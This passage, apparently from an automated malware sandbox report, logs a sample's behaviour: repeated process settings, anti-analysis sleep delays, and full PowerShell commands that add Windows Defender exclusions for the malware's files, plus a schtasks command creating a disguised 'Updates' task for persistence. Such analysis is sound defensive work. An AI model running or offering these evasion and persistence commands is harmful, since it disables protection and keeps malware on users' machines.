                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess information set: NOGPFAULTERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: kzQ25HVUbf.exe PID: 7568, type: MEMORYSTR
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeMemory allocated: 1280000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeMemory allocated: 4CA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeMemory allocated: 7DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeMemory allocated: 7370000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeMemory allocated: 8DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeMemory allocated: 9DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeMemory allocated: CA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeMemory allocated: 2710000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeMemory allocated: 7070000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeMemory allocated: 8070000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeMemory allocated: 8200000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeMemory allocated: 9200000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3049Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5086Jump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exe TID: 7588Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exe TID: 8080Thread sleep count: 82 > 30Jump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exe TID: 8080Thread sleep time: -4920000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe TID: 5940Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: kzQ25HVUbf.exe, 00000009.00000002.2599826516.0000000001078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz3
                Source: iWEWjTXiqXke.exe, 00000012.00000002.1570258791.0000000001468000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeCode function: 18_2_0040317B mov eax, dword ptr fs:[00000030h]18_2_0040317B
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeCode function: 18_2_00402B7C GetProcessHeap,HeapAlloc,18_2_00402B7C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe"
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"Jump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"Jump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Users\user\Desktop\kzQ25HVUbf.exe "C:\Users\user\Desktop\kzQ25HVUbf.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"Jump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeQueries volume information: C:\Users\user\Desktop\kzQ25HVUbf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
